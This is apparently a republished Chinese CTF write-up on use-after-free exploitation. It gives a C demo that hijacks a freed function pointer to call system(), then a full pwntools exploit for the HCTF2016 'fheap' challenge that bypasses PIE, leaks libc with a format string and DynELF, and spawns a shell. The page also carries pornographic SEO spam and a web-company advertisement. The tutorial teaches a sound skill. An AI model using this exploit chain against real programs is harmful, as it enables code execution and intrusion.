日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
逆向安全系列:Use After Free漏洞淺析

一、前言

成都創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務,包含不限于做網(wǎng)站、成都網(wǎng)站建設、泰山網(wǎng)絡推廣、成都微信小程序、泰山網(wǎng)絡營銷、泰山企業(yè)策劃、泰山品牌公關、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運營等,從售前售中售后,我們都將竭誠為您服務,您的肯定,是我們最大的嘉獎;成都創(chuàng)新互聯(lián)公司為所有大學生創(chuàng)業(yè)者提供泰山建站搭建服務,24小時服務熱線:18980820575,官方網(wǎng)址:www.cdcxhl.com

想著接下來要寫一個use after free的小總結,剛好碰巧最近的湖湘杯2016的一題----game利用use after free可以解出來。這題是自己***次在比較正式的比賽中做出pwn題,做這題的時間花了不少,效率不高,但自己還是蠻開心的,后面回頭做hctf2016的fheap這題,也可以用uaf解出來,game這題題目的復雜度稍微高一點,描述起來有點難,下面主要是用hctf的這道題來給大家講述原理。對于uaf漏洞,搜了下,uaf漏洞在瀏覽器中存在很多,有興趣的同學可以自己去查查。

二、uaf原理

uaf漏洞產(chǎn)生的主要原因是釋放了一個堆塊后,并沒有將該指針置為NULL,這樣導致該指針處于懸空的狀態(tài),同樣被釋放的內(nèi)存如果被惡意構造數(shù)據(jù),就有可能會被利用。先上一段代碼給大家一個直觀印象再具體解釋。

 
 
 
 
  1. #include  
  2. #include  
  3. typedef void (*func_ptr)(char *); 
  4. void evil_fuc(char command[]) 
  5. system(command); 
  6. void echo(char content[]) 
  7. printf("%s",content); 
  8. int main() 
  9. func_ptr *p1=(int*)malloc(4*sizeof(int)); 
  10. printf("malloc addr: %p\n",p1); 
  11. p1[3]=echo; 
  12. p1[3]("hello world\n"); 
  13. free(p1); //在這里free了p1,但并未將p1置空,導致后續(xù)可以再使用p1指針 
  14. p1[3]("hello again\n"); //p1指針未被置空,雖然free了,但仍可使用. 
  15. func_ptr *p2=(int*)malloc(4*sizeof(int));//malloc在free一塊內(nèi)存后,再次申請同樣大小的指針會把剛剛釋放的內(nèi)存分配出來. 
  16. printf("malloc addr: %p\n",p2); 
  17. printf("malloc addr: %p\n",p1);//p2與p1指針指向的內(nèi)存為同一地址 
  18. p2[3]=evil_fuc; //在這里將p1指針里面保存的echo函數(shù)指針覆蓋成為了evil_func指針. 
  19. p1[3]("whoami"); 
  20. return 0; 

這段代碼在32位系統(tǒng)下執(zhí)行。通過這段代碼可以大概將uaf的利用過程小結為以下過程:

1、申請一段空間,并將其釋放,釋放后并不將指針置為空,因此這個指針仍然可以使用,把這個指針簡稱為p1。

2、申請空間p2,由于malloc分配的過程使得p2指向的空間為剛剛釋放的p1指針的空間,構造惡意的數(shù)據(jù)將這段內(nèi)存空間布局好,即覆蓋了p1中的數(shù)據(jù)。

3、利用p1,一般多有一個函數(shù)指針,由于之前已使用p2將p1中的數(shù)據(jù)給覆蓋了,所以此時的數(shù)據(jù)既是我們可控制的,即可能存在劫持函數(shù)流的情況。

三、hctf2016--fheap

uaf原理還比較簡單,下面就是具體的實踐了,這個漏洞復雜一些的話就和double free這些其他的堆的常見利用方法合起來一起出題,具體的可以看bctf2015的freenote。不過fheap這題用uaf直接就解決了。還有就是湖湘杯2016的game題,和fheap基本上是一樣的,這題大家跟出來了的話可以去做下game試下。先介紹fheap的功能。

A、程序功能

程序提供的功能比較簡單,總共兩個功能:

1、create string

輸入create 后,接著輸入size,后輸入具體的字符串。相關的數(shù)據(jù)結構則是:先申請0x20字節(jié)的堆塊存儲結構,如果輸入的字符串長度大于0xf,則另外申請對應長度的空間存儲字符串,否則直接存儲在之前申請的0x20字節(jié)的前16字節(jié)處,在***,會將相關free函數(shù)的地址存儲在堆存儲結構的后八字節(jié)處。相關示意圖描繪如下:

2、delete string

調(diào)用存儲在結構體里的free_func這個指針來釋放堆,由于在釋放以后沒有將指針置空,出現(xiàn)了釋放后仍可利用的現(xiàn)象,即uaf。

B、查看防護機制

首先查看開啟的安全機制

可以看到開啟了PIE,在解題的過程中還需要繞過PIE,PIE是指代碼段的地址也會隨機化,不過低兩位的字節(jié)是固定的,利用這一點我們可以來泄露出程序的地址。

C、利用思路

總思路:首先是利用uaf,利用堆塊之間申請與釋放的步驟,形成對free_func指針的覆蓋。從而達到劫持程序流的目的。具體來說,先申請的是三個字符創(chuàng)小于0xf的堆塊,并將其釋放。此時fastbin中空堆塊的單鏈表結構如下左圖,緊接著再申請一個字符串長度為0x20的字符串,此時,申請出來的堆中的數(shù)據(jù)會如下右圖,此時后面申請出來的堆塊與之前申請出來的1號堆塊為同一內(nèi)存空間,這時候輸入的數(shù)據(jù)就能覆蓋到1號堆塊中的free_func指針,指向我們需要執(zhí)行的函數(shù),隨后再調(diào)用1號堆塊的free_func函數(shù),即實現(xiàn)了劫持函數(shù)流的目的。

1、繞過PIE,在能劫持函數(shù)流之后,首先是泄露出程序的地址以繞過PIE,具體的方法是將free_func指針的***位覆蓋成"\x2d",變成去執(zhí)行fputs函數(shù),***變成去打印出free_func的地址,從而得到程序的基地址等。

2、泄露system函數(shù)地址,首先有了程序的地址后,可以得到printf函數(shù)的plt地址,從而想辦法在棧中部署數(shù)據(jù),使用格式化字符串打印出我們需要的地址中的內(nèi)容,使用DynELF模塊去泄露地址,具體可以看安全客之前有人寫的一篇文章---借助DynELF實現(xiàn)無libc的漏洞利用小結。從而泄露出system函數(shù)的地址。

3、執(zhí)行system("/bin/sh")

最終調(diào)用system函數(shù)開啟shell。

D、最終exp

exp最終如下,里面還有部分注釋。

 
 
 
 
  1. from pwn import * 
  2. from ctypes import * 
  3. DEBUG = 1 
  4. if DEBUG: 
  5.      p = process('./fheap') 
  6. else: 
  7.      r = remote('172.16.4.93', 13025) 
  8. print_plt=0 
  9. def create(size,content): 
  10.     p.recvuntil("quit") 
  11.     p.send("create ") 
  12.     p.recvuntil("size:") 
  13.     p.send(str(size)+'\n') 
  14.     p.recvuntil('str:') 
  15.     p.send(content.ljust(size,'\x00')) 
  16.     p.recvuntil('\n')[:-1] 
  17. def delete(idx): 
  18.    p.recvuntil("quit") 
  19.    p.send("delete "+'\n') 
  20.    p.recvuntil('id:') 
  21.     p.send(str(idx)+'\n') 
  22.     p.recvuntil('sure?:') 
  23.     p.send('yes '+'\n') 
  24. def leak(addr): 
  25.     delete(0) 
  26.     #printf函數(shù)格式化字符串打印第九個參數(shù)地址中的數(shù)據(jù),第九個剛好是輸入addr的位置 
  27.     data='aa%9$s'+'#'*(0x18-len('aa%9$s'))+p64(print_plt) 
  28.     create(0x20,data) 
  29.     p.recvuntil("quit") 
  30.     p.send("delete ") 
  31.     p.recvuntil('id:') 
  32.     p.send(str(1)+'\n') 
  33.     p.recvuntil('sure?:') 
  34.     p.send('yes01234'+p64(addr)) 
  35.     p.recvuntil('aa') 
  36.     data=p.recvuntil('####')[:-4] 
  37.     data += "\x00" 
  38.     return data 
  39. def pwn(): 
  40.     global print_plt 
  41.      create(4,'aa') 
  42.      create(4,'bb') 
  43.     create(4,'cc') 
  44.      delete(2) 
  45.     delete(1) 
  46.     delete(0) 
  47.     #申請三個堆塊,隨后刪除,從而在fastbin鏈表中形成三個空的堆塊 
  48.     #part1 覆蓋到fputs函數(shù),繞過PIE 
  49.     data='a'*0x10+'b'*0x8+'\x2D'+'\x00'#***次覆蓋,泄露出函數(shù)地址。 
  50.     create(0x20,data)#在這里連續(xù)創(chuàng)建兩個堆塊,從而使輸入的data與前面的塊1公用一塊內(nèi)存。 
  51.     delete(1)#這里劫持函數(shù)程序流 
  52.     p.recvuntil('b'*0x8) 
  53.     data=p.recvuntil('1.')[:-2] 
  54.     if len(data)>8: 
  55.         datadata=data[:8] 
  56.     data=u64(data.ljust(8,'\x00'))-0xA000000000000 #這里減掉的數(shù)可能不需要,自行調(diào)整 
  57.      proc_base=data-0xd2d 
  58.     print "proc base",hex(proc_base) 
  59.     print_plt=proc_base+0x9d0 
  60.     print "print plt",hex(print_plt) 
  61.     delete(0) 
  62.     data='a'*0x10+'b'*0x8+'\x2D'+'\x00' 
  63.     create(0x20,data) 
  64.     delete(1) 
  65.     p.recvuntil('b'*0x8) 
  66.     data=p.recvuntil('1.')[:-2] 
  67.     #part2 使用DynELF泄露system函數(shù)地址 
  68.      d = DynELF(leak, proc_base, elf=ELF('./fheap')) 
  69.     system_addr = d.lookup('system', 'libc') 
  70.     print "system_addr:", hex(system_addr) 
  71.      
  72.     #parts 執(zhí)行system函數(shù),開啟shell 
  73.     delete(0) 
  74.     data='/bin/sh;'+'#'*(0x18-len('/bin/sh;'))+p64(system_addr) 
  75.     create(0x20,data) 
  76.     delete(1) 
  77.     p.interactive() 
  78.     #### 
  79.     #利用的方式總結為 
  80.     #delete(0),將申請出來的堆塊添入到fastbin中 
  81.     #create(0x20,data),連續(xù)申請兩個堆塊,數(shù)據(jù)覆蓋1堆中的free_func指針 
  82.      #delete(1)劫持函數(shù)流,調(diào)用我們覆蓋的指針處的地址 
  83.     ### 
  84.     if __name__ == '__main__': 
  85.             pwn() 

執(zhí)行結果

四、小結

我感覺UAF最主要的是,在釋放了堆塊以后沒有將指針置空,后續(xù)過程中內(nèi)存空間數(shù)據(jù)被覆蓋為其他數(shù)據(jù)后,該指針仍然可以正常使用該內(nèi)存,從而導致數(shù)據(jù)的誤用。ctf題中容易碰見的是,釋放的堆塊中原本某個區(qū)域是用來存儲函數(shù)指針的,后面被惡意構造的數(shù)據(jù)覆蓋成其他地址實現(xiàn)了劫持函數(shù)流的目的,從而有可能就被pwn掉了。


網(wǎng)站名稱:逆向安全系列:Use After Free漏洞淺析
標題鏈接:http://m.5511xx.com/article/dpddsjj.html